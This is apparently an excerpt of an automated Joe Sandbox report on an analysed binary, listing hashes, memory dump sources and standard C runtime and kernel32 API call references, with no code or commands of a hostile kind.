                                                                                                                                      • Instruction ID: 20896e3731c63b46410f9ae03b83013b5d2bcfdeb2b92c438772e5dcdf3ab943
                                                                                                                                      • Opcode Fuzzy Hash: 36ed8b6ecde76e713ed5664ad7bca21133a4629b5a161ec796bed534cf1d9197
                                                                                                                                      • Instruction Fuzzy Hash: 6491B478E00218CFDB54DFA5C894BADBBB2BF88304F608129D815AB398DB359946DF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ec980f6710521a3294888e58ae6fc521b1948abad6ec7d343265ae98668c65eb
                                                                                                                                      • Instruction ID: 5c5c68359d882e920d7ee2a8b32f131dcb643854e77c9303d920547e804a724b
                                                                                                                                      • Opcode Fuzzy Hash: ec980f6710521a3294888e58ae6fc521b1948abad6ec7d343265ae98668c65eb
                                                                                                                                      • Instruction Fuzzy Hash: 0291B478E00218CFDB54DFA5C894BADBBB2BF88304F208129D815AB398DB355D46DF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                      • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                      • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                      • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b655eaf7e2f7be21326bfa8fb1d4c2034121be15cd371b0683d57fe3021011dc
                                                                                                                                      • Instruction ID: 4ca12aaf12f23138a7d8a1d81d84fa29ee206d8828281002740ab69ef8a4f0f3
                                                                                                                                      • Opcode Fuzzy Hash: b655eaf7e2f7be21326bfa8fb1d4c2034121be15cd371b0683d57fe3021011dc
                                                                                                                                      • Instruction Fuzzy Hash: 5C513870D052588FEB45DFAAD8506EEBFF2EF8A300F64C16AD444AB265DB344946CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Instruction ID: 8e9ca9fb3f18190a443a8663175e75e04de9b1bdefe46b5cbbafd7a4a2285cd4
                                                                                                                                      • Opcode Fuzzy Hash: f0fea75cc5352ab72d511f165f24e01bf3ca8460b9897f453ef8d4e067818eea
                                                                                                                                      • Instruction Fuzzy Hash: E3411474E012089BEB58DFAAD8847DEBBF2BF89304F10D06AD419BB255EB344942CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9347bf4069aba683c9b1fa5a8e938160136294a11d89f3d8e21dd9ef331d9665
                                                                                                                                      • Instruction ID: 8b45ddccf0e19557448127d81d72076a8ae88f92fc9956b9f82cce257232f6da
                                                                                                                                      • Opcode Fuzzy Hash: 9347bf4069aba683c9b1fa5a8e938160136294a11d89f3d8e21dd9ef331d9665
                                                                                                                                      • Instruction Fuzzy Hash: 4D410874E052488FDB84DFAAD8406DEBBF2BF9A300F14D06AD819BB259DB354906CF51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b31822db1a1379071d19f300401f7ab0a8f26a91391dc4507d1afa6234843e31
                                                                                                                                      • Instruction ID: eb482cdc15a29ec3574d9d545b275677320eae1189b67d297875b4b29faa05c6
                                                                                                                                      • Opcode Fuzzy Hash: b31822db1a1379071d19f300401f7ab0a8f26a91391dc4507d1afa6234843e31
                                                                                                                                      • Instruction Fuzzy Hash: 0441F674D002188BDB58DFAAD84479EBBF2BF89300F64D06AD418BB255EB345986CF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: eaf50c8530e254c9dc5e2eed84cafe9577fce5c113a09a447bea15279f57631b
                                                                                                                                      • Instruction ID: 78fb12a86576cbb5ed6ffbe4745692d9af26274ebcbf35617836019d3e7e8298
                                                                                                                                      • Opcode Fuzzy Hash: eaf50c8530e254c9dc5e2eed84cafe9577fce5c113a09a447bea15279f57631b
                                                                                                                                      • Instruction Fuzzy Hash: CC41E470D042588BEB58DFAAC8546DDFBF2EF89300F64C06AC458AB358EB345946CF44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d5e4120f57bc2718595c69ed0c2c4946337055f6e5b058e755d825dc6ee4f30a
                                                                                                                                      • Instruction ID: 804f5b62f2b20bd90353258fab979647bb013fb12aeede51a5724e3288356b8b
                                                                                                                                      • Opcode Fuzzy Hash: d5e4120f57bc2718595c69ed0c2c4946337055f6e5b058e755d825dc6ee4f30a
                                                                                                                                      • Instruction Fuzzy Hash: 2841D470D012588BEB58DFAAC85469EFBB2AF89300F64D02AC414BB258EB344946CF44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f725d78762955c9c5eb290cd704bf5617b197bc1d1665118a487f2dd337a9554
                                                                                                                                      • Instruction ID: 3521a5d87ac3dea934cdd8eee130bd16b7f8742068529035940a80adfe6095b3
                                                                                                                                      • Opcode Fuzzy Hash: f725d78762955c9c5eb290cd704bf5617b197bc1d1665118a487f2dd337a9554
                                                                                                                                      • Instruction Fuzzy Hash: FB41E675E002188BDB98DFAAD8943EEBBF2BF89304F60C06AD418B7254DB344946CF44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c21629f3d8db410bde333afce5632b605ae604ac5d39e4fc034794aac8ad1d6c
                                                                                                                                      • Instruction ID: b80d09297459d760fea57ecfdd7e95e9ce48c926e3e2fc909b3bfb8b3bba3d1b
                                                                                                                                      • Opcode Fuzzy Hash: c21629f3d8db410bde333afce5632b605ae604ac5d39e4fc034794aac8ad1d6c
                                                                                                                                      • Instruction Fuzzy Hash: 9A41E374D002198BEB58DFAAD85469DBBF2AF89304F60C06AC458AB265EB344942CF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 11db69c3d9049b325f22a0a745763012817a487a2a50d74540ad9caa13594d33
                                                                                                                                      • Instruction ID: 36eb90f2e68321dfb1290c550d7a3eb04ccf8ae2623ea1d637166c66f7670fb9
                                                                                                                                      • Opcode Fuzzy Hash: 11db69c3d9049b325f22a0a745763012817a487a2a50d74540ad9caa13594d33
                                                                                                                                      • Instruction Fuzzy Hash: B241E3B5E012589FDB48DFAAD8506DEBBB2BF89300F10D06AD818AB355DB345906CF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                      • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                      • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                      • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 413434100ffbe4e0234f00a917fb88e5c3d655a28c06ea8dc8a8a285752ef1ca
                                                                                                                                      • Instruction ID: 179d8d52373a36e94fef8db460b574a4c8682f69613c5d699500b748477e6ea3
                                                                                                                                      • Opcode Fuzzy Hash: 413434100ffbe4e0234f00a917fb88e5c3d655a28c06ea8dc8a8a285752ef1ca
                                                                                                                                      • Instruction Fuzzy Hash: 7241E4B4D002188BEB58DFAAD8547EEBBF2BF89304F14D06AC459BB255DB345942CF40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 46a9a354ceb800ae429ba147e82d87d535e113b8d62b33ada99c059b3e00b326
                                                                                                                                      • Instruction ID: 3a937e7566cad6e85fb707bf4851fe11fec57a65a32fc330cf46069b7c8c1f2a
                                                                                                                                      • Opcode Fuzzy Hash: 46a9a354ceb800ae429ba147e82d87d535e113b8d62b33ada99c059b3e00b326
                                                                                                                                      • Instruction Fuzzy Hash: BB41E4B4E002188BEB58DFAAD9547DEBBF2BF89304F14D06AC419BB265DB345946CF40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f6b56fda2710a4a8a17668e5475d3d6d316134a967d314590442d5ef02cd1bb1
                                                                                                                                      • Instruction ID: 8a042503b12da4d9412cab5c2e2c80480f30f958258f4928d01f4f7ed6ef43d9
                                                                                                                                      • Opcode Fuzzy Hash: f6b56fda2710a4a8a17668e5475d3d6d316134a967d314590442d5ef02cd1bb1
                                                                                                                                      • Instruction Fuzzy Hash: A84103B4E00218CBDB58DFAAD8447AEBBF2BF89304F10C06AC419BB255EB345946CF44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      APIs
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02181948), ref: 004170C5
                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                      • String ID: 1.2.3
                                                                                                                                      • API String ID: 680241177-2310465506
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                      APIs
                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                      • String ID: 'B
                                                                                                                                      • API String ID: 2805327698-2787509829
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                      • String ID: @.B
                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                      • InterlockedIncrement.KERNEL32(02181690), ref: 00414050
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                      • String ID: P$B$`$B
                                                                                                                                      • API String ID: 3494438863-235554963
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                      APIs
                                                                                                                                      • ___addlocaleref.LIBCMT ref: 0041470C
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                                                                                                        • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                                                                                                      • ___removelocaleref.LIBCMT ref: 00414717
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                                                                                                        • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 0041472B
                                                                                                                                        • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                                                                                                                                        • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                                                                                                                                        • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                      • String ID: @.B
                                                                                                                                      • API String ID: 467427115-470711618
                                                                                                                                      APIs
                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2395185920-0
